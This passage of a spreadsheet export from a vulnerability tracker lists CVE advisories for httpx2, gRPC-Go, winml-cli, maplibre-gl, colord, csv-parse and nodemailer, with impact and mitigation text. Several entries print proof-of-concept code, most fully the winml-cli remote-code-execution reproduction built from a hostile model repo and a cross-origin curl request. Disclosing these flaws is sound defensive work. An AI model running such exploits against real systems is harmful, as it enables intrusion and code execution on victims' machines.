Reported by @Ryoga-exe.</t></is></c><c r="T72" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84376</t></is></c></row><row r="73"><c r="A73" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B73" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C73" s="5" t="inlineStr"><is><t>CVE-2026-84378</t></is></c><c r="D73" s="5" t="inlineStr" /><c r="E73" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F73" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G73" s="5" t="inlineStr" /><c r="H73" s="5" t="n"><v>0.003</v></c><c r="I73" s="5" t="inlineStr" /><c r="J73" s="5" t="inlineStr" /><c r="K73" s="5" t="inlineStr" /><c r="L73" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M73" s="5" t="inlineStr"><is><t>2.10.0</t></is></c><c r="N73" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O73" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P73" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q73" s="5" t="inlineStr" /><c r="R73" s="5" t="inlineStr" /><c r="S73" s="5" t="inlineStr"><is><t>### Summary

HTTPX2's Server-Sent Events (SSE) parser repeatedly copied and rescanned buffered text when a server split one unterminated line across many response chunks. The total work grows quadratically with the length of the line. An attacker-controlled or compromised SSE endpoint can exploit this behavior to consume excessive client CPU.

### Details

Before version 2.10.0, HTTPX2 combined the complete pending SSE line with each newly received chunk and then scanned the combined text for line separators. If an SSE server sends a long line as many small chunks without a line separator, every chunk causes all previously received text to be copied and scanned again. For `n` fixed-size chunks, this results in O(n²) processing.

The behavior affects both `httpx2.Client.sse()` and `httpx2.AsyncClient.sse()`. Other response APIs do not use the SSE parsing path.

### Impact

Applications that consume SSE from an attacker-controlled or compromised endpoint can experience excessive CPU usage. A crafted stream can block a synchronous worker or the asynchronous event loop that is consuming it, degrading availability for other work in that process. Confidentiality and integrity are not affected.

### Mitigation

Upgrade to HTTPX2 2.10.0 or later. SSE parsing now accumulates incomplete line fragments and combines them only when necessary, making processing linear in the amount of received data. HTTPX2 2.10.0 also limits buffered SSE events to 1 MiB by default through `max_event_size`.

If upgrading is not immediately possible, only consume SSE from trusted endpoints and enforce an external size or time budget on the stream.</t></is></c><c r="T73" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84378</t></is></c></row><row r="74"><c r="A74" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B74" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C74" s="5" t="inlineStr"><is><t>CVE-2026-84379</t></is></c><c r="D74" s="5" t="inlineStr" /><c r="E74" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F74" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G74" s="5" t="inlineStr" /><c r="H74" s="5" t="n"><v>0.003</v></c><c r="I74" s="5" t="inlineStr" /><c r="J74" s="5" t="inlineStr" /><c r="K74" s="5" t="inlineStr" /><c r="L74" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M74" s="5" t="inlineStr"><is><t>2.11.0</t></is></c><c r="N74" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O74" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P74" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q74" s="5" t="inlineStr" /><c r="R74" s="5" t="inlineStr" /><c r="S74" s="5" t="inlineStr"><is><t>### Summary

HTTPX2 serializes the per-file `Content-Type` and custom headers supplied through the `files=` tuple API directly into the `multipart/form-data` body without validating custom header names or values. An attacker who can influence upload metadata passed to HTTPX2 can use CR or LF characters to terminate a multipart part header and inject additional part headers or end the part header block early.

### Details

The three-element file tuple accepts `(filename, content, content_type)`, and the four-element form accepts `(filename, content, content_type, headers)`. `FileField.render_headers()` interpolates the supplied header names and values between CRLF delimiters without validating them.

For example:

```python
import httpx2

request = httpx2.Request(
    "POST",
    "https://example.com/upload",
    headers={"Content-Type": "multipart/form-data; boundary=BOUNDARY"},
    files={
        "file": (
            "safe.txt",
            b"payload",
            "text/plain\r\nX-Injected: true",
        )
    },
)

print(request.read().decode())
```

The generated body contains an attacker-injected part header:

```text
--BOUNDARY
Content-Disposition: form-data; name="file"; filename="safe.txt"
Content-Type: text/plain
X-Injected: true

payload
--BOUNDARY--
```

The same issue affects names and values in the custom header mapping from the four-element tuple.

Field names and filenames are serialized through a separate escaping path and do not permit CRLF header injection.

### Impact

Applications are affected when they pass attacker-controlled upload metadata into the per-file `content_type` or custom `headers` arguments. The receiving server interprets injected lines as genuine multipart part headers. Depending on how that server validates and processes uploads, this can alter part semantics or bypass checks based on part headers.

This does not split the outer HTTP request: the injected headers are contained within the multipart body. The concrete security impact therefore depends on the downstream multipart parser and application behavior.

### Mitigation

Upgrade to HTTPX2 `2.11.0` or later. Patched versions reject forbidden control characters in multipart part header names and values and raise `ValueError` before serializing the request.

If upgrading is not immediately possible, applications should validate custom multipart header names as HTTP field-name tokens. They should reject NUL, CR, LF, other C0 controls except horizontal tab, and DEL in per-file content types and custom header values before passing them to HTTPX2.</t></is></c><c r="T74" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84379</t></is></c></row><row r="75"><c r="A75" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B75" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C75" s="5" t="inlineStr"><is><t>CVE-2026-84380</t></is></c><c r="D75" s="5" t="inlineStr" /><c r="E75" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F75" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G75" s="5" t="inlineStr" /><c r="H75" s="5" t="n"><v>0.002</v></c><c r="I75" s="5" t="inlineStr" /><c r="J75" s="5" t="inlineStr" /><c r="K75" s="5" t="inlineStr" /><c r="L75" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M75" s="5" t="inlineStr"><is><t>2.11.0</t></is></c><c r="N75" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O75" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P75" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q75" s="5" t="inlineStr" /><c r="R75" s="5" t="inlineStr" /><c r="S75" s="5" t="inlineStr"><is><t>### Summary

HTTPX2 can automatically add a `Content-Length` header to a request that already contains a caller-supplied `Transfer-Encoding` header. The resulting HTTP/1.1 request contains both framing headers, which can create an ambiguous message boundary and enable request smuggling or connection desynchronization when processed by intermediaries that disagree about which header takes precedence.

### Details

When a request body has a known size, HTTPX2's content encoder returns a default `Content-Length`. `Request._prepare()` applies each default header with `setdefault()`, which only checks whether that same header is already present. It does not check whether the mutually exclusive `Transfer-Encoding` header is present.

For example:

```python
import httpx2

request = httpx2.Request(
    "POST",
    "http://example.com/",
    headers={"Transfer-Encoding": "chunked"},
    content=b"test 123",
)

print(request.headers)
```

The request contains both:

```text
Transfer-Encoding: chunked
Content-Length: 8
```

On an HTTP/1.1 connection, the body is serialized using chunked transfer coding while both headers are sent on the wire. This violates HTTP message-framing requirements. Fixed-size byte, JSON, form, and known-length multipart bodies can reach the affected path.

Streaming bodies with an explicit `Content-Length` are not affected in current HTTPX2 releases because the automatically generated `Transfer-Encoding` is already suppressed in that direction.

### Impact

An attacker may be able to use the conflicting framing headers as a request-smuggling or desynchronization primitive. Exploitation requires an application to pass attacker-controlled request framing headers and associated body data to HTTPX2, use HTTP/1.1, and communicate through a proxy or origin that accepts conflicting headers and interprets them differently from another hop.

Depending on the downstream infrastructure, successful exploitation could interfere with requests sharing a persistent connection, bypass front-end routing or authorization decisions, or poison responses or caches. Applications that do not forward attacker-controlled `Transfer-Encoding` headers are not directly exposed.

### Mitigation

Upgrade to HTTPX2 `2.11.0` or later. Patched versions treat `Content-Length` and `Transfer-Encoding` as mutually exclusive when applying automatically generated request headers.

If upgrading is not immediately possible, remove `Transfer-Encoding` and other hop-by-hop framing headers from untrusted input before constructing outbound requests. Applications acting as proxies should derive outbound framing from the body rather than forwarding inbound `Content-Length` or `Transfer-Encoding` headers.</t></is></c><c r="T75" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84380</t></is></c></row><row r="76"><c r="A76" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B76" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C76" s="5" t="inlineStr"><is><t>CVE-2026-84381</t></is></c><c r="D76" s="5" t="inlineStr" /><c r="E76" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F76" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G76" s="5" t="inlineStr" /><c r="H76" s="5" t="n"><v>0.001</v></c><c r="I76" s="5" t="inlineStr" /><c r="J76" s="5" t="inlineStr" /><c r="K76" s="5" t="inlineStr" /><c r="L76" s="5" t="inlineStr"><is><t>PyPI:httpcore2, PyPI:httpx2</t></is></c><c r="M76" s="5" t="inlineStr"><is><t>2.10.0</t></is></c><c r="N76" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O76" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P76" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q76" s="5" t="inlineStr" /><c r="R76" s="5" t="inlineStr" /><c r="S76" s="5" t="inlineStr"><is><t>### Summary

httpcore2 does not start TLS for `wss://` connections routed through a SOCKS5 proxy. The WebSocket opening handshake and all subsequent frames are sent in plaintext through the proxy path, despite the caller selecting the secure `wss` scheme.

The transport flaw affects httpcore2 releases before `2.10.0`. HTTPX2 exposed this behavior through its public `Client.websocket()` and `AsyncClient.websocket()` APIs from `2.6.0` through `2.9.1`.

### Details

The synchronous and asynchronous SOCKS5 connection implementations upgrade the established proxy tunnel to TLS only when the remote origin scheme is `https`. The equivalent check does not include `wss`. After the SOCKS5 handshake succeeds, the raw stream is therefore passed directly to the HTTP/1.1 connection, which writes the WebSocket upgrade request without first performing a TLS handshake or verifying the destination certificate.

For example, an application using HTTPX2 `2.6.0` through `2.9.1` may open an authenticated WebSocket through a SOCKS proxy:

```python
import httpx2

with httpx2.Client(proxy="socks5://proxy.example:1080") as client:
    with client.websocket(
        "wss://service.example/private?token=query-secret",
        headers={"Authorization": "Bearer header-secret"},
        cookies={"session": "cookie-secret"},
    ) as websocket:
        websocket.send_text("private message")
```

On affected versions, the stream passing through the SOCKS proxy begins with a plaintext request such as:

```text
GET /private?token=query-secret HTTP/1.1
Host: service.example
Authorization: Bearer header-secret
Cookie: session=cookie-secret
```

Before HTTPX2 `2.6.0`, the same underlying httpcore2 behavior could be reached by integrations constructing a WebSocket upgrade request through the low-level transport API, but HTTPX2 did not yet provide its native WebSocket client API.

A normal secure WebSocket server will usually reject these plaintext bytes because it expects a TLS ClientHello. However, a malicious or compromised SOCKS proxy can accept the SOCKS connection, observe the plaintext handshake, return a forged `101 Switching Protocols` response, and then read or modify WebSocket frames in both directions. An observer between the proxy and destination may also read the plaintext traffic.

RFC 6455 requires a client using a secure WebSocket connection to perform the TLS handshake before sending the WebSocket opening handshake. A `wss` URI promises confidentiality, integrity, and endpoint authentication through TLS.

### Impact

An attacker able to control or observe the SOCKS proxy path can obtain URL query parameters, authorization headers, cookies, and application messages that the caller expected TLS to protect. Because no TLS handshake occurs, certificate verification also does not occur, allowing an attacker controlling the proxy to impersonate the WebSocket server and inject or alter messages.

Only `wss://` connections routed through a SOCKS5 proxy are affected. Direct `wss://` connections and ordinary `https://` requests through SOCKS already start TLS correctly.

### Mitigation

Upgrade HTTPX2 and httpcore2 to `2.10.0` or later. Patched versions start TLS for both `https` and `wss` origins in the synchronous and asynchronous SOCKS5 connection paths.

If upgrading is not immediately possible, do not route `wss://` connections through a SOCKS proxy. Use a direct secure WebSocket connection or another transport that performs and verifies TLS to the WebSocket origin.</t></is></c><c r="T76" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84381</t></is></c></row><row r="77"><c r="A77" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B77" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C77" s="5" t="inlineStr"><is><t>CVE-2026-84382</t></is></c><c r="D77" s="5" t="inlineStr" /><c r="E77" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F77" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G77" s="5" t="inlineStr" /><c r="H77" s="5" t="n"><v>0.004</v></c><c r="I77" s="5" t="inlineStr" /><c r="J77" s="5" t="inlineStr" /><c r="K77" s="5" t="inlineStr" /><c r="L77" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M77" s="5" t="inlineStr"><is><t>2.12.0</t></is></c><c r="N77" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O77" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P77" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q77" s="5" t="inlineStr" /><c r="R77" s="5" t="inlineStr" /><c r="S77" s="5" t="inlineStr"><is><t>### Summary

When decoding a compressed response body (`gzip`, `deflate`, `br`, or `zstd`), HTTPX2 fully decompressed each network read before yielding content to the application. A small compressed input could therefore cause a large intermediate memory allocation, even when the application streamed the response to keep memory usage bounded.

### Details

HTTPX2's default transport reads the socket in pieces of up to 64 KiB. Before `2.12.0`, each piece was inflated completely into one intermediate allocation before any decompressed bytes were yielded.

At DEFLATE's maximum compression ratio of roughly 1032:1, a 64 KiB compressed chunk can expand to about 64 MiB in one allocation. Brotli and Zstandard responses can cause similarly large amplification. Streaming the response did not prevent these transient allocations.

### Impact

Applications that fetch resources from untrusted or attacker-influenced servers - such as webhook receivers, link unfurlers, crawlers, SSRF-reachable fetchers, and redirect followers - can experience memory pressure or out-of-memory termination when processing a malicious compressed response. No authentication or user interaction is required beyond issuing a request to the server.

### Mitigation

Upgrade to HTTPX2 `2.12.0` or later. Patched versions decompress responses incrementally with bounded intermediate buffers, including responses with multiple content encodings.</t></is></c><c r="T77" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84382</t></is></c></row><row r="78"><c r="A78" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B78" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C78" s="5" t="inlineStr"><is><t>CVE-2026-84445</t></is></c><c r="D78" s="5" t="inlineStr" /><c r="E78" s="5" t="inlineStr" /><c r="F78" s="5" t="inlineStr" /><c r="G78" s="5" t="inlineStr" /><c r="H78" s="5" t="n"><v>0.007</v></c><c r="I78" s="5" t="inlineStr" /><c r="J78" s="5" t="inlineStr" /><c r="K78" s="5" t="inlineStr" /><c r="L78" s="5" t="inlineStr"><is><t>Go:google.golang.org/grpc</t></is></c><c r="M78" s="5" t="inlineStr"><is><t>1.82.2, 1.83.2, 1.85.0-dev.0.20260825072537-93e31b48545e</t></is></c><c r="N78" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O78" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P78" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q78" s="5" t="inlineStr" /><c r="R78" s="5" t="inlineStr" /><c r="S78" s="5" t="inlineStr"><is><t>A vulnerability exists in gRPC-Go servers configured with `xds.NewGRPCServer()` where a crafted request missing both `:authority` and `Host` headers can cause a server panic, resulting in a Denial of Service (DoS).

Servers built with `xds.NewGRPCServer` install an xDS routing interceptor on every RPC. This interceptor looks up the request’s `:authority` header to pick a virtual host. The HTTP/2 server transport previously accepted requests that had neither `:authority` nor `Host`. When this happened, the xDS routing interceptor attempted to access the first element of an empty slice of authorities, leading to an index out of bounds panic. Since the per-RPC goroutine does not recover from panics, the entire server process would terminate.

This panic occurs in the interceptor pipeline, meaning the transport credentials handshake (TLS, mTLS, or ALTS) and HTTP/2 connection establishment must complete successfully before the crafted request can reach this logic.
- Insecure/Standard TLS: If the server permits insecure (plaintext) connections or standard credentials (where client certs are not checked), any unauthenticated remote attacker can trigger the crash.
- mTLS / ALTS: If strict transport-level authentication is enforced at the network edge or transport layer (e.g., requiring a valid client certificate), the attacker must possess valid transport credentials to initiate the stream and trigger the panic.

### Impact
An attacker can cause a complete outage of the gRPC server by sending a request missing both `:authority` and `Host` headers, provided they can successfully establish a transport connection.

### Patches
The issue has been addressed in `master` (and backported to `1.83.2` and `1.82.2`). The fix updates the HTTP/2 transport layer to reject requests missing both `:authority` and `Host` headers early, maintaining consistency with and other gRPC language implementations.</t></is></c><c r="T78" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84445</t></is></c></row><row r="79"><c r="A79" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B79" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C79" s="5" t="inlineStr"><is><t>CVE-2026-84452</t></is></c><c r="D79" s="5" t="inlineStr" /><c r="E79" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F79" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G79" s="5" t="inlineStr" /><c r="H79" s="5" t="n"><v>0.008999999999999999</v></c><c r="I79" s="5" t="inlineStr" /><c r="J79" s="5" t="inlineStr" /><c r="K79" s="5" t="inlineStr" /><c r="L79" s="5" t="inlineStr"><is><t>PyPI:winml-cli</t></is></c><c r="M79" s="5" t="inlineStr"><is><t>0.4.0</t></is></c><c r="N79" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O79" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P79" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q79" s="5" t="inlineStr" /><c r="R79" s="5" t="inlineStr" /><c r="S79" s="5" t="inlineStr"><is><t>Case Description:

MSRC Notes: Attachments: 1 file(s) attached (1 mp4) Summary: The vulnerability lies in the 'serve/cli_api.py' component of the 'winml-cli' project, which exposes all winml CLI commands over HTTP without authentication. Although it binds to localhost by default, it sets 'allow_origins' to a wildcard, allowing any website to interact with the endpoint. This, combined with the '--trust-remote-code' flag in 'build' and 'config' commands, enables an attacker to execute arbitrary code by hosting a malicious model repository. The root cause is the lack of proper authentication and validation of the 'trust_remote_code' parameter, leading to Remote Code Execution (RCE).

Finder Description: WARNING: Original content contained invalid characters. Please see original submission in the event that the characters removed are relevant for the PoC.

serve/cli_api.py exposes every winml CLI command over HTTP with no authentication. That's defensible on its own - it binds 127.0.0.1 by default, so the audience is this machine. But it also sets allow_origins=["*"] (cli_api.py:150, duplicated at app.py:219), and the victim's browser is a local process: the wildcard lets any website call the endpoint and read the reply, erasing the boundary the loopback bind draws.

build and config both accept --trust-remote-code, and a JSON true becomes that flag unfiltered. An attacker-named model repo reaches AutoConfig.from_pretrained(..., trust_remote_code=True) (_autoconfig.py:191), where transformers imports Python from that repo - RCE as the server user from any page the victim loads. The payload runs on import, so the command's exit_code: 1 is irrelevant.

Reported Repro Steps:

1. Setup

git clone -q https://github.com/microsoft/winml-cli.git ~/winml-poc &amp;&amp; cd ~/winml-poc &amp;&amp;  mkdir -p temp /tmp/poc/evil/pwn
python3 -m pip install -q --target /tmp/poc/deps onnx onnxruntime transformers fastapi uvicorn click
2. Hostile model repo (payload is module-level → runs on import)

cat &gt; /tmp/poc/evil/pwn/config.json &lt;&lt;'EOF'
{"model_type":"pwn","auto_map":{"AutoConfig":"configuration_pwn.PwnConfig"}}
EOF
cat &gt; /tmp/poc/evil/pwn/configuration_pwn.py &lt;&lt;'EOF'
import getpass, os, socket, time
from transformers import PretrainedConfig
with open(os.environ["PWN_MARKER"], "w") as f:
    f.write(f"ARBITRARY CODE EXECUTION\ntime={time.strftime('%F %T')}\n"
            f"user={getpass.getuser()}\nhost={socket.gethostname()}\npid={os.getpid()}\n")
class PwnConfig(PretrainedConfig):
    model_type = "pwn"
EOF
3. Start server

Windows: python -m uvicorn winml.modelkit.serve.cli_api:app --host 127.0.0.1 --port 8000

Linux needs a stub for the Windows-only PDH module (no security relevance):

cat &gt; /tmp/poc/serve.py &lt;&lt;'EOF'
import os, sys, types, uvicorn
m = types.ModuleType("winml.modelkit.session.monitor._pdh")
class PdhPoller:
    def __init__(s,*a,**k): pass
    def start(s,*a,**k): pass
    def stop(s,*a,**k): pass
    def poll(s,*a,**k): return {}
    def sample(s,*a,**k): return {}
    def close(s,*a,**k): pass
m.PdhPoller = PdhPoller; m.PDH_AVAILABLE = False
sys.modules["winml.modelkit.session.monitor._pdh"] = m
from winml.modelkit.serve.cli_api import app
uvicorn.run(app, host="127.0.0.1", port=8000, log_level="warning")
EOF
cd ~/winml-poc &amp;&amp; PWN_MARKER=~/winml-poc/temp/PWNED PYTHONPATH=src:/tmp/poc/deps setsid nohup python3 /tmp/poc/serve.py &gt;/tmp/poc/log 2&gt;&amp;1 &lt;/dev/null &amp;
sleep 8; until curl -sf -o /dev/null -m 1 http://127.0.0.1:8000/openapi.json; do sleep 1; done; echo up
4. Exploit

curl -s -D- -o /dev/null -X POST http://127.0.0.1:8000/v1/cli/build \
 -H 'Origin: https://evil.example' -H 'Content-Type: application/json' \
 -d '{"args":{"model":"/tmp/poc/evil/pwn","output_dir":"/tmp/poc/out","trust_remote_code":true}}' \
 | grep -iE '^HTTP|^access-control-allow-origin'
cat ~/winml-poc/temp/PWNED
HTTP/1.1 200 OK
access-control-allow-origin: *
ARBITRARY CODE EXECUTION
time=2026-08-17 11:24:35
user=shrini  host=Shrinivasan  pid=11616</t></is></c><c r="T79" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84452</t></is></c></row><row r="80"><c r="A80" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B80" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C80" s="5" t="inlineStr"><is><t>CVE-2026-85061</t></is></c><c r="D80" s="5" t="inlineStr" /><c r="E80" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F80" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G80" s="5" t="inlineStr" /><c r="H80" s="5" t="n"><v>0.003</v></c><c r="I80" s="5" t="inlineStr" /><c r="J80" s="5" t="inlineStr" /><c r="K80" s="5" t="inlineStr" /><c r="L80" s="5" t="inlineStr"><is><t>npm:maplibre-gl</t></is></c><c r="M80" s="5" t="inlineStr"><is><t>6.4.1</t></is></c><c r="N80" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O80" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P80" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q80" s="5" t="inlineStr" /><c r="R80" s="5" t="inlineStr" /><c r="S80" s="5" t="inlineStr"><is><t>### Impact
`DOM.sanitize()` in `src/util/dom.ts` iterated `elem.attributes` (a live `NamedNodeMap`) while calling `elem.removeAttribute()` in the same loop. Removing an attribute shifts subsequent attributes down by one index, causing the iterator to skip the adjacent attribute.

An attacker can provide an HTML payload with consecutive dangerous attributes (such as `&lt;details open onload="1" ontoggle="..."&gt;`). The first attribute is stripped while the second survives and executes upon insertion into `innerHTML` via the attribution control without requiring user interaction (zero-click XSS).

Applications rendering untrusted/third-party style attribution strings or user-supplied custom attributions are impacted.

### Patches
The issue has been resolved by creating a static snapshot of attributes using `Array.from(elem.attributes)` before iteration. Please upgrade to `maplibre-gl` version **6.4.1** (or latest).

### Workarounds
Sanitizing the attribute field of a source before passing it down to maplibre</t></is></c><c r="T80" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85061</t></is></c></row><row r="81"><c r="A81" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B81" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C81" s="5" t="inlineStr"><is><t>CVE-2026-85062</t></is></c><c r="D81" s="5" t="inlineStr" /><c r="E81" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F81" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G81" s="5" t="inlineStr" /><c r="H81" s="5" t="n"><v>0.003</v></c><c r="I81" s="5" t="inlineStr" /><c r="J81" s="5" t="inlineStr" /><c r="K81" s="5" t="inlineStr" /><c r="L81" s="5" t="inlineStr"><is><t>npm:colord</t></is></c><c r="M81" s="5" t="inlineStr"><is><t>2.9.4</t></is></c><c r="N81" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O81" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P81" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q81" s="5" t="inlineStr" /><c r="R81" s="5" t="inlineStr" /><c r="S81" s="5" t="inlineStr"><is><t>### Impact

`colord`'s CSS color string matchers described a number as `([+-]?\d*\.?\d+)`. In that form `\d*` and `\d+` can match the same digits, so a run of *n* digits can be divided between them in O(n²) ways, and rejecting an input retries every division. Parsing is synchronous and uninterruptible, so a long malformed color string blocks the thread:

| input | time to reject |
| --- | --- |
| 16 KB | 224 ms |
| 64 KB | 4.4 s |
| 128 KB | 18.5 s |

Reachable through `colord()` and `getFormat()`, and through any method that accepts a color string — including `isEqual()`, `mix()` and `contrast()`. The affected matchers are `parseRgbaString` and `parseHslaString` (built in) and `parseHwbaString`, `parseLchaString`, `parseCmykaString` (plugins).

Growth is polynomial, not exponential — multi-kilobyte payloads are required for a noticeable stall.

### Who is affected

Applications that pass attacker-controlled strings of unbounded length to `colord()` — for example a server validating a color taken from a request body, JSON field, or uploaded stylesheet. `colord` applies no length limit before matching.

Typical client-side use with short input is not meaningfully affected.

### Patches

Fixed in **2.9.4**. The number is now written as `([+-]?(?:\d*\.\d+|\d+))`, which accepts exactly the same syntax but leaves only one way to match it, making rejection linear — 1 MB of input is rejected in ~5 ms.

### Workarounds

Reject or truncate color strings longer than a sane limit (e.g. 100 characters) before passing them to `colord`.</t></is></c><c r="T81" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85062</t></is></c></row><row r="82"><c r="A82" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B82" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C82" s="5" t="inlineStr"><is><t>CVE-2026-85063</t></is></c><c r="D82" s="5" t="inlineStr" /><c r="E82" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F82" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G82" s="5" t="inlineStr" /><c r="H82" s="5" t="n"><v>0.003</v></c><c r="I82" s="5" t="inlineStr" /><c r="J82" s="5" t="inlineStr" /><c r="K82" s="5" t="inlineStr" /><c r="L82" s="5" t="inlineStr"><is><t>npm:csv-parse</t></is></c><c r="M82" s="5" t="inlineStr"><is><t>7.0.2</t></is></c><c r="N82" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O82" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P82" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q82" s="5" t="inlineStr" /><c r="R82" s="5" t="inlineStr" /><c r="S82" s="5" t="inlineStr"><is><t>### Impact
With columns: true and group_columns_by_name: true, a duplicated __proto__  header causes the duplicate-column branch to assign an array to obj['__proto__'], invoking the __proto__ setter and replacing the parsed record object's prototype with attacker-controlled data. Fixed in 7.0.2 (Object.hasOwn duplicate check + Object.defineProperty assignment).

### Patches
The problem been patched.

### Workarounds
Disable usage of both the columns and  group_columns_by_name options.

### References
issue #496, PR #497</t></is></c><c r="T82" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85063</t></is></c></row><row r="83"><c r="A83" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B83" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C83" s="5" t="inlineStr"><is><t>CVE-2026-92595</t></is></c><c r="D83" s="5" t="inlineStr" /><c r="E83" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F83" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G83" s="5" t="inlineStr" /><c r="H83" s="5" t="inlineStr" /><c r="I83" s="5" t="inlineStr" /><c r="J83" s="5" t="inlineStr" /><c r="K83" s="5" t="inlineStr" /><c r="L83" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M83" s="5" t="inlineStr"><is><t>9.1.1</t></is></c><c r="N83" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O83" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P83" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q83" s="5" t="inlineStr" /><c r="R83" s="5" t="inlineStr" /><c r="S83" s="5" t="inlineStr"><is><t>### Summary

Nodemailer's `disableFileAccess` / `disableUrlAccess` options are a security sandbox that lets an application forbid untrusted message content (`html`/`text`/attachment `path`/`href`) from reading local files or making outbound HTTP(S) requests. The fix for GHSA-wqvq-jvpq-h66f (commit `5f69497`) threaded these flags through the library's internal resolution paths (`MailMessage.resolveAll()` and `_convertDataImages()`), but the public plugin API `MailMessage.resolveContent(...args)` (`lib/mailer/mail-message.js:41-43`) remains a raw passthrough to `shared.resolveContent()`.

When called with the documented legacy signature `mail.resolveContent(data, key, callback)`, `shared.resolveContent` normalizes the missing options argument to an empty object (`options = options || {}`, `lib/shared/index.js:530`). The message-level flags that the `MailMessage` constructor already copied into `mail.data` (`lib/mailer/mail-message.js:34-38`) are silently discarded, so `resolveContentValue` skips both access-control guards and reaches `nmfetch(url)` (SSRF, `lib/shared/index.js:588`) or `fs.createReadStream(path)` (arbitrary file read, `lib/shared/index.js:597`).

